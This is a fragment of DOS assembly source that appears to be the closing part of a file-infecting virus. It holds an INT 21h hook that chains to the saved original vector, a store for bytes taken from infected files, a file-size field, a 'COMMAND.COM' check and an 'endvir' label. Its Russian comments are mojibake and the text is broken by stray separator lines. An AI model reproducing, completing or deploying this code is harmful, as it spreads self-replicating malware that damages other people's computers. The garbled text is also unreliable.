mov cx,20
|
|||
|
int 10h ; <20>뢮<EFBFBD><EBA2AE><EFBFBD> '<27>' ( 20 <20><>.)
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov dh,25
|
|||
|
mov dl,0
|
|||
|
int 10h ; <20>室<EFBFBD><E5AEA4> <20><> <20><>࠭<EFBFBD><E0A0AD><EFBFBD>
|
|||
|
|
|||
|
mov ah,2
|
|||
|
mov bh,0
|
|||
|
mov dh,24
|
|||
|
mov dl,0
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD>樮<EFBFBD><E6A8AE><EFBFBD>㥬 <20><> 24,0
|
|||
|
|
|||
|
MOV AL,2
|
|||
|
mov ah,0
|
|||
|
int 10h ; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>頥<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>०<EFBFBD><E0A5A6>
|
|||
|
|
|||
|
mov al,[count-0124h]
|
|||
|
cmp al,3
|
|||
|
jz game ; <20><><EFBFBD>!!! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
|
|||
|
eee: pop ds ; <20><><EFBFBD> <20><><EFBFBD> 㦥 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<2C>९<EFBFBD><E0A5AF><EFBFBD>!
|
|||
|
|
|||
|
EndExec:
|
|||
|
pop dx ; <20><> ⠬, <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD>࠭
|
|||
|
pop cx ; <20><><EFBFBD><EFBFBD><EFBFBD> 祣<><E7A5A3>-<2D><>?
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
jmp Quit21Server ; <20> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>!
|
|||
|
|
|||
|
NotExec:
|
|||
|
; <20><> <20><><EFBFBD>砩 <><E1ABA5><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 堬᪨<E5A0AC> ࠧࠡ<E0A0A7>⮪
|
|||
|
|
|||
|
Quit21Server:
|
|||
|
pop ds ; <20><><EFBFBD> <20><> <20><> ⮫쪮
|
|||
|
pop bx ; STACK'<27><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>?!
|
|||
|
pop ax
|
|||
|
popf ; <20><><EFBFBD> <20> 䫠<><E4ABA0><EFBFBD><EFBFBD>?!!!
|
|||
|
db 0EAh
|
|||
|
Off21 dw 0000h ; <20><><EFBFBD> <20>㤥<EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD>...
|
|||
|
Seg21 dw 0000h
|
|||
|
|
|||
|
RobbedBytes:
|
|||
|
mov dx,offset GoodMessage ; <20><><EFBFBD> <20>த<EFBFBD> <20><><EFBFBD> ᯥ<><E1AFA5><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
db 0B4h
|
|||
|
SuperByte db '<27>' ; <20> <20><><EFBFBD> <20><> ᯥ<><E1AFA5><EFBFBD><EFBFBD>, <20><>
|
|||
|
FileSize dw 0000h ; ⮦<> <20><><EFBFBD><EFBFBD>訥
|
|||
|
db 15 ; <20><>ਪ<EFBFBD><E0A8AA><EFBFBD>
|
|||
|
db '=>' ; <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
CommandName db 'COMMAND.COM<=' ; <20> <20><><EFBFBD> <20><> COMMAND.COM
|
|||
|
count db 1 dup (0) ; <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>稪
|
|||
|
REG DB 1 DUP (0)
|
|||
|
endvir:
|
|||
|
end gadost ; <20> <20><><EFBFBD>!
|